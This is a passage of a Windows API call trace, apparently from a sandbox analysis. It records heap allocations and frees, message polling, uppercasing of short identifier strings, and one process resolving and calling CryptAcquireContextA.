hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0207.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.321] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0207.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0207.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0207.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.321] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0207.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0207.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.322] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.325] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.325] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.325] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0207.325] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.326] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0207.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.326] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.327] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.327] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.327] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.327] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.327] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.328] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0207.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.328] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0207.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.329] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.330] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.330] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.330] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.331] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.331] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, 